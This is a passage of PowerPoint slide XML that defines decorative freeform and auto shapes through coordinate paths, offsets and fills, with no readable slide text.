                  <a:pt x="2003005" y="746662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1970448" y="777125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1936776" y="806355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1902023" y="834319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1866226" y="860979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1829419" y="886301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1791639" y="910247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1752919" y="932784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1713297" y="953874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1672807" y="973482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1631485" y="991573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1589366" y="1008110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546486" y="1023058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1502880" y="1036382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1458583" y="1048045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1413632" y="1058012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1368061" y="1066246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1321905" y="1072713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1275201" y="1077377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1227984" y="1080201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1180289" y="1081151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1132593" y="1080201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1085376" y="1077377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1038673" y="1072713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="992518" y="1066246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="946948" y="1058012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901997" y="1048045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="857702" y="1036382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="814097" y="1023058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="771219" y="1008110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="729101" y="991573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687781" y="973482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647293" y="953874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607673" y="932784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568956" y="910247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="531177" y="886301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494372" y="860979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="458577" y="834319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423827" y="806355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390157" y="777125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357603" y="746662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326200" y="715003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295983" y="682184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266988" y="648241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239251" y="613208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212807" y="577123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187691" y="540020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163938" y="501936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141585" y="462906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120666" y="422966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101217" y="382151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83273" y="340498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66871" y="298042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52044" y="254818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38829" y="210863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27261" y="166213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17376" y="120902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9208" y="74967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2794" y="2844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5" name="Freeform 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1962150" y="752475"/>
            <a:ext cx="400050" cy="409575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="400050" h="409575">
                <a:moveTo>
                  <a:pt x="200025" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="154155" y="5408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112050" y="20814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74911" y="44986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43937" y="76694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20327" y="114707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5281" y="157793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="204724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5281" y="251701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20327" y="294821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43937" y="332856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74911" y="364578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112050" y="388757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154155" y="404165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200025" y="409575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245894" y="404165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287999" y="388757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325138" y="364578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356112" y="332856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379722" y="294821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394768" y="251701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400050" y="204724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394768" y="157793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379722" y="114707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356112" y="76694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325138" y="44986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287999" y="20814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245894" y="5408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200025"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16" name="Freeform 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5500623"/>
            <a:ext cx="748030" cy="600710"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="748030" h="600710">
                <a:moveTo>
                  <a:pt x="747711" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="745906" y="46903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740578" y="92818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731862" y="137613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719891" y="181153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="704799" y="223305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686718" y="263935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665782" y="302911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="642125" y="340099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615879" y="375365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587180" y="408577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556159" y="439600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522950" y="468301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487687" y="494548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450503" y="518207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411531" y="539143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370906" y="557225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328759" y="572318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285226" y="584289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240439" y="593005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194531" y="598333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="600138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100740" y="598333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54831" y="593005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10042" y="584289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="58152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7" name="Freeform 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2014473"/>
            <a:ext cx="748030" cy="3486150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="748030" h="3486150">
                <a:moveTo>
                  <a:pt x="0" y="18615"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10046" y="15852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54834" y="7134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100741" y="1805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194531" y="1932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240439" y="7258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285226" y="15972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328759" y="27941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370906" y="43031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411531" y="61109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450503" y="82042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487687" y="105696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522950" y="131938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556159" y="160635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587180" y="191654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615879" y="224861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="642125" y="260123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665782" y="297306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686718" y="336278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="704799" y="376906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719891" y="419054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731862" y="462592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740578" y="507384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="745906" y="553299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="747711" y="600201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="747711" y="348615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8" name="Freeform 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5567426"/>
            <a:ext cx="938530" cy="790575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="938530" h="790575">
                <a:moveTo>
                  <a:pt x="938211" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="936768" y="48153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="932495" y="95543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="925474" y="142088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="915788" y="187705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903519" y="232312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="888751" y="275825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871566" y="318161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852046" y="359239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="830275" y="398975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="806335" y="437286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780309" y="474091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752279" y="509306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722328" y="542848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690539" y="574635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656995" y="604584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="621778" y="632613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584971" y="658638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546656" y="682577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506917" y="704348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465835" y="723867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423495" y="741052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379977" y="755820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335366" y="768088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289744" y="777774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243193" y="784795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195796" y="789068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="790511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99476" y="789068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52079" y="784795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5528" y="777774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="776600"/>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9" name="Freeform 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1766823"/>
            <a:ext cx="938530" cy="3801110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="938530" h="3801110">
                <a:moveTo>
                  <a:pt x="0" y="13911"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5532" y="12737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52082" y="5716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99477" y="1442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195796" y="1569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243193" y="5843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289744" y="12864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335366" y="22550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379977" y="34818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423495" y="49586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465835" y="66772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506917" y="86291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546656" y="108062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584971" y="132002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="621778" y="158029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656995" y="186059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690539" y="216009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722328" y="247798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752279" y="281343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780309" y="316560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="806335" y="353367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="830275" y="391682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852046" y="431421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871566" y="472502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="888751" y="514843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903519" y="558360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="915788" y="602971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="925474" y="648594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="932495" y="695145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="936768" y="742542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="938211" y="790701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="938211" y="380060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0" name="Freeform 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5624512"/>
            <a:ext cx="1129030" cy="981075"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1129030" h="981075">
                <a:moveTo>
                  <a:pt x="1128711" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1127580" y="47533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1124220" y="94484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118683" y="140798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1111021" y="186427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101284" y="231317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1089525" y="275417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075794" y="318677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060143" y="361045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1042623" y="402469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023286" y="442898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1002183" y="482281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979366" y="520566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="954886" y="557701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928794" y="593636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901141" y="628319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871980" y="661699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="841361" y="693724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809336" y="724343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775956" y="753505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="741273" y="781157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="705338" y="807249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668202" y="831730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="629917" y="854547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590535" y="875650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550106" y="894987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508682" y="912506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466314" y="928157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423054" y="941888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="378953" y="953648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334063" y="963384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288435" y="971047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242120" y="976583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195170" y="979943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="981075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100102" y="979943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53152" y="976583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6837" y="971047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="96989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1" name="Freeform 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1509649"/>
            <a:ext cx="1129030" cy="4115435"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1129030" h="4115435">
                <a:moveTo>
                  <a:pt x="0" y="11177"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6837" y="10028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53152" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100102" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195170" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242120" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288435" y="10028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334063" y="17692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="378953" y="27429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423054" y="39190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466314" y="52922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508682" y="68574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550106" y="86095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590535" y="105434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="629917" y="126538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668202" y="149357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="705338" y="173839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="741273" y="199932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775956" y="227586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809336" y="256749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="841361" y="287369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871980" y="319395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901141" y="352776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928794" y="387459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="954886" y="423395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979366" y="460531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1002183" y="498816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023286" y="538198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1042623" y="578627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060143" y="620050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075794" y="662416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1089525" y="705675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101284" y="749774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1111021" y="794661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118683" y="840287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1124220" y="886598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1127580" y="933545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1128711" y="981075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1128711" y="4114863"/>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2" name="Freeform 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4914900"/>
            <a:ext cx="2038350" cy="1762125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2038350" h="1762125">
                <a:moveTo>
                  <a:pt x="0" y="1762125"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2038350" y="1762125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2038350" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1762125"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="AutoShape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="61817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4" name="AutoShape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="66770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5" name="AutoShape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="6343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6" name="Freeform 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="6515100"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33274" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20359" y="2244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9779"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AutoShape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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8" name="AutoShape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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157162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0" name="Freeform 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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1" name="AutoShape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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2" name="AutoShape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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132397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4" name="Freeform 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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5" name="AutoShape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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6" name="AutoShape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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7" name="AutoShape 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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8" name="Freeform 38"/>
